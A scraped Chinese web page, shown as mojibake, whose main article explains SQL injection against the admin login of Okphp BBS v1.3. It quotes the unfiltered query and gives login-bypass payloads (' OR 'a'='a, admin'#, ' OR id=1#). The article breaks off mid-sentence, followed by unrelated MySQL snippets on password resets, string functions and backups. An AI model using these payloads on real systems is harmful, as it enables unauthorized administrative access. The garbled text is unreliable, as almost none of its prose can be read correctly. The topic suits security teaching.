Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

¹¥»÷·½·¨£ºÌ¸php+mysql×¢ÉäÓï¾ä¹¹Ôì

Ò».ǰÑÔ£º
¡¡¡¡°æ±¾ÐÅÏ¢£ºOkphp BBS v1.3 ¿ªÔ´°æ
¡¡¡¡ÏÂÔØµØÖ·£ºhttp://www.cncode.com/SoftView.asp?SoftID=1800
¡¡¡¡ÓÉÓÚPHPºÍMYSQL±¾ÉíµÃÔ­Òò,PHP+MYSQLµÄ×¢ÉäÒª±ÈaspÀ§ÄÑ£¬ÓÈÆäÊÇ×¢ÉäʱÓï¾äµÄ¹¹Ôì·½Ãæ¸üÊǸöÄѵ㣬±¾ÎÄÖ÷ÒªÊǽè¶ÔOkphp BBS v1.3һЩÎļþµÃ¼òµ¥·ÖÎö£¬À´Ì¸Ì¸php+mysql×¢ÉäÓï¾ä¹¹Ô췽ʽ£¬Ï£Íû±¾ÎĶÔÄãÓеã°ïÖú¡£
¡¡¡¡ÉùÃ÷£ºÎÄÕÂËùÓÐÌáµ½µÄ“©¶´”£¬¶¼Ã»Óо­¹ý²âÊÔ£¬¿ÉÄܸù±¾²»´æÔÚ£¬ÆäʵÓÐûÓЩ¶´²¢²»ÖØÒª£¬ÖØÒªµÄÊÇ·ÖÎö˼·ºÍÓï¾ä¹¹Ôì¡£
¡¡¡¡¶þ.“©¶´”·ÖÎö£º
¡¡¡¡1.admin/login.php×¢Éäµ¼ÖÂÈÆ¹ýÉí·ÝÑé֤©¶´£º
¡¡¡¡´úÂ룺
¡¡¡¡$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
¡¡¡¡$password = md5($password);
¡¡¡¡$q = "select id,group_id from $user_table where username='$username' and password='$password'";
¡¡¡¡$res = sql_query($q,$conn);
¡¡¡¡$row = sql_fetch_row($res);
¡¡¡¡$q = "select id,group_id from $user_table where username='$username' and password='$password'"ÖÐ
¡¡¡¡$username ºÍ $password û¹ýÂË£¬ ºÜÈÝÒ×¾ÍÈÆ¹ý¡£
¡¡¡¡¶ÔÓÚselect * from $user_table where username='$username' and password='$password'ÕâÑùµÄÓï¾ä¸ÄÔìµÄ·½·¨ÓУº
¡¡¡¡¹¹Ôì1(ÀûÓÃÂß¼­ÔËËã)£º$username=' OR 'a'='a $password=' OR 'a'='a
¡¡¡¡Ï൱ÓÚsqlÓï¾ä£º
¡¡¡¡select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'
¡¡¡¡¹¹Ôì2(ÀûÓÃmysqlÀïµÄ×¢ÊÍÓï¾ä# £¬/* °Ñ$password×¢Ê͵ô)£º$username=admin'#(»òadmin'/*)
¡¡¡¡¼´£º
¡¡¡¡select * from $user_table where username='admin'#' and password='$password'"
¡¡¡¡Ï൱ÓÚ£º
¡¡¡¡select * from $user_table where username='admin'
¡¡¡¡ÔÚadmin/login.phpÖÐ$qÓï¾äÖеÄ$passwordÔÚ²éѯǰ½øÐÐÁËmd5¼ÓÃÜËùÒÔ²»¿ÉÒÔÓù¹Ôì1ÖеÄÓï¾äÈÆ¹ý¡£ÕâÀïÎÒÃÇÓù¹Ôì2£º
¡¡¡¡select id,group_id from $user_table where username='admin'#' and password='$password'"
¡¡¡¡Ï൱ÓÚ£º
¡¡¡¡select id,group_id from $user_table where username='admin'
¡¡¡¡Ö»Òª´æÔÚÓû§ÃûΪadminµÄ¾Í³ÉÁ¢£¬Èç¹û²»ÖªµÀÓû§Ãû£¬Ö»ÖªµÀ¶ÔÓ¦µÄid£¬
¡¡¡¡ÎÒÃǾͿÉÒÔÕâÑù¹¹Ô죺$username=' OR id=1#
¡¡¡¡Ï൱ÓÚ£º
¡¡¡¡select id,group_id from $user_table where username='' OR id=1# and password='$password'(#ºóµÄ±»×


Ïà¹ØÎĵµ£º

ÐÞ¸ÄMYSQLÃÜÂë


ÏÈÓÃrootµÇ½mysql   -u   root   -p  
  mysql>show   databases;  
  mysql>use   mysql;  
update   user   set   password=password('ÄãÏëÉèÖõÄÃÜÂë')  
where   user='root';   ......

mysqlÖÐÖÐ×Ö·û´®½ØÈ¡º¯Êý

MySQL ×Ö·û´®½ØÈ¡º¯Êý£ºleft(), right(), substring(), substring_index()¡£»¹ÓÐ mid(), substr()¡£ÆäÖУ¬mid(), substr() µÈ¼ÛÓÚ substring() º¯Êý£¬substring() µÄ¹¦Äܷdz£Ç¿´óºÍÁé»î¡£ 1. ×Ö·û´®½ØÈ¡£ºleft(str, length) mysql> select left('sqlstudy.com', 3);+-------------------------+| left('sqlstudy.com', 3) | ......

MYSQLºÍjavaÖеÄÊýÖµ·¶Î§ 91KGE

mysqlÊýÖµ·¶Î§
tinyint  -128~127   0~255
smallint  -32768~32767  0~65535
mediumint -8388608~8388607  0~16777215
int -2147483648~2147483647 0~4294967295
bigint  -9223372036854775808~9223372036854775807   0~18446744073709551615
javaÖÐ
byte   ......

mysqlÊý¾Ý¿â±¸·Ý

E:\databases\MySQL\MySQL Server 5.1\bin>mysqldump --help
mysqldump  Ver 10.13 Distrib 5.1.30, for Win32 (ia32)
By Igor Romanenko, Monty, Jani & Sinisa
This software comes with ABSOLUTELY NO WARRANTY. This is free softwa
and you are welcome to modify and redistribute it under the GPL ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØÍ¼ | ¸ÓICP±¸09004571ºÅ